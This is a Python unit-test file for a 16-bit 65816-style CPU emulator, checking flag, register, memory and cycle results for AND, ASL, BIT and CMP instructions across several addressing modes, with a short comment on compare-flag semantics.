self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Immediate
def test_and_immediate_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND #$0000
self._write(mpu.memory, 0x0000, (0x29, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_immediate_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND #$AAAA
self._write(mpu.memory, 0x0000, (0x29, 0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ASL Accumulator
def test_asl_accumulator_sets_z_flag(self):
mpu = self._make_mpu()
mpu.a = 0x00
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_accumulator_sets_n_flag(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_accumulator_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0x7FFF
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFE, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_accumulator_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFE, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_asl_accumulator_80_sets_z_flag(self):
mpu = self._make_mpu()
mpu.a = 0x8000
mpu.p &= ~(mpu.ZERO)
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
# ASL Absolute
def test_asl_absolute_sets_z_flag(self):
mpu = self._make_mpu()
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x00, mpu.memory[0xABCD+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_absolute_sets_n_flag(self):
mpu = self._make_mpu()
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x80, mpu.memory[0xABCD+1])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_absolute_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_absolute_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Absolute, X-Indexed
def test_asl_abs_x_indexed_sets_z_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x00, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_abs_x_indexed_sets_n_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x80, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_abs_x_indexed_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_abs_x_indexed_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Direct Page
def test_asl_dp_sets_z_flag(self):
mpu = self._make_mpu()
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x00, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_dp_sets_n_flag(self):
mpu = self._make_mpu()
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x80, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_dp_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_dp_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Direct Page, X-Indexed
def test_asl_dp_x_indexed_sets_z_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x00, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_dp_x_indexed_sets_n_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x80, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_dp_x_indexed_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.x = 0x03
mpu.a = 0xAA
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_dp_x_indexed_shifts_out_one(self):
mpu = self._make_mpu()
mpu.x = 0x03
mpu.a = 0xAA
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# BIT Absolute
def test_bit_abs_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_abs_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_abs_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_abs_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_abs_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
def test_bit_abs_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0xFEED])
def test_bit_abs_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
# BIT Absolute, X-Indexed
def test_bit_abs_x_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
# BIT Direct Page
def test_bit_dp_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_dp_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_dp_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_dp_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_dp_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010])
def test_bit_dp_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0x0010])
def test_bit_dp_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010])
# BIT Direct Page, X-Indexed
def test_bit_dp_x_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0xFF, 0xFF))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_dp_x_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_dp_x_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0xFF, 0xFF))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_dp_x_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_dp_x_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
def test_bit_dp_x_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x01, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0x0010 + mpu.x])
def test_bit_dp_x_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
# BIT Immediate
def test_bit_imm_does_not_affect_n_and_v_flags(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE | mpu.OVERFLOW
# $0000 BIT #$FFFF
self._write(mpu.memory, 0x0000, (0x89, 0xff, 0xff))
mpu.a = 0x00
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0x00, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT #$0000
self._write(mpu.memory, 0x0000, (0x89, 0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT #$0001
self._write(mpu.memory, 0x0000, (0x89, 0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT #$0000
self._write(mpu.memory, 0x0000, (0x89, 0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
# Compare instructions
# See http://6502.org/tutorials/compare_instructions.html
# and http://www.6502.org/tutorials/compare_beyond.html
# Cheat sheet:
#
# - Comparison is actually subtraction "register - memory"
# - Z contains equality result (1 equal, 0 not equal)
# - C contains result of unsigned comparison (0 if A<m, 1 if A>=m)
# - N holds MSB of subtraction result (*NOT* of signed subtraction)
# - V is not affected by comparison
# - D has no effect on comparison
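#
# A minimal, non-normative sketch of how those rules follow from a
# 16-bit "register - memory" subtraction, assuming the 16-bit
# accumulator width used throughout these tests (the helper name is
# illustrative only and is not part of the emulator's API):
def _compare_flags_sketch(self, reg, m):
    """Return (z, c, n) for a 16-bit register-vs-memory compare."""
    result = (reg - m) & 0xFFFF
    z = (result == 0x0000)       # Z: set only when the values are equal
    c = (reg >= m)               # C: unsigned comparison, 1 if reg >= m
    n = bool(result & 0x8000)    # N: MSB of the subtraction result
    return z, c, n
# e.g. _compare_flags_sketch(0x0001, 0x1010) gives (False, False, True),
# matching the CMP #$1010 test with A = 1 below.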
# CMP Immediate
def test_cmp_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: A == m"""
mpu = self._make_mpu()
# $0000 CMP #$1010, A will be 0x1010
self._write(mpu.memory, 0x0000, (0xC9, 0x10, 0x10))
mpu.a = 0x1010
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_cmp_imm_clears_zero_carry_takes_neg_if_less_unsigned(self):
"""Comparison: A < m (unsigned)"""
mpu = self._make_mpu()
# $0000 CMP #$1010, A will be 1
self._write(mpu.memory, 0x0000, (0xC9, 0x10, 0x10))
mpu.a = 1
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0x0001-0x1010=0xEFF1
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY)
